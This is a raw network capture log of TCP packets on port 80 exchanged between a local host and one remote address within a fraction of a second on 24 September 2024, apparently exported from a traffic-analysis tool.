                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510142088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510155916 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510173082 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510173082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510185003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510205030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510211945 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510237932 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.510262012 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.526832104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.526901007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.526911974 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.526913881 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.526942968 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527009964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527009964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527009964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527033091 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527043104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527070999 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527080059 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527133942 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.527133942 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535402060 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535438061 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535454035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535464048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535478115 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535492897 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535531998 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535558939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535571098 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535592079 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535598040 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535620928 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.535644054 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574464083 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574502945 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574512005 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574553013 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574587107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574599028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574616909 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574630022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574712038 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574712038 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574712038 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574814081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574824095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574841976 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574846983 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574850082 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574861050 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574886084 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574919939 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574945927 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574955940 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574975014 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574984074 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.574989080 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575026035 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575130939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575172901 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575180054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575190067 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575218916 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575238943 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575318098 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575329065 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575351000 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575359106 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575367928 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575377941 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575398922 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575417995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575462103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575473070 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575494051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575500011 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575508118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575525045 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575551987 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575731993 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575742960 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575761080 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575771093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575782061 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575789928 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575802088 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575819969 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575823069 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575836897 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575854063 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575859070 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575866938 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575881004 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575884104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575917006 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.575949907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576139927 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576152086 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576169968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576183081 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576203108 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576204062 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576216936 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576234102 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576241970 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576246977 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576263905 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576276064 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576284885 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576297045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576311111 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576318026 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576334953 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576354980 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576654911 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576666117 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576673031 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576678991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576683998 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576709986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576716900 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576745987 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576783895 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576962948 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576975107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.576997995 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577003956 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577049971 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577141047 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577152014 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577167988 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577182055 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577184916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577198029 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577214003 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577214003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577228069 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577239990 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577245951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577258110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577272892 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577274084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577296019 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577297926 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577301025 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577307940 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577321053 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577328920 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577347994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577356100 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577358007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577392101 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577414989 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577728987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577742100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577761889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577773094 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577775955 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577791929 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577792883 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577816010 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577848911 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577872038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577888966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577903032 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577910900 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577923059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577929974 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577939987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577951908 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577954054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577969074 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577970982 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577986956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577996969 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.577997923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578005075 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578025103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578028917 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578038931 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578051090 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578058958 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578074932 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578095913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578095913 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578108072 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578130007 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578165054 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578752041 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578769922 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578783989 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578799009 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578799963 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578819036 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578830957 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578841925 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578859091 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578867912 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578870058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578886986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578887939 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578898907 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578919888 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.578957081 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599663973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599701881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599715948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599761009 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599796057 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599817991 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599829912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599848986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599863052 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599864960 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599889994 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.599927902 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600106001 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600117922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600157022 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600249052 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600260973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600281000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600291967 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600294113 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600306988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600327015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600337029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600343943 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600358009 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600372076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600389957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600392103 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600404024 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600413084 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600425959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600440025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600444078 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600467920 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600506067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600564003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600575924 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600600958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600605965 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600615025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600631952 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600634098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600649118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600657940 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600667000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600680113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600697041 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600697041 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600722075 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600745916 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600919008 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600929976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600945950 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600961924 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600966930 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600980043 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.600986958 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601000071 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601021051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601036072 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601037979 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601052046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601058960 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601073027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.601083040 CEST4973480192.168.2.8103.130.147.211
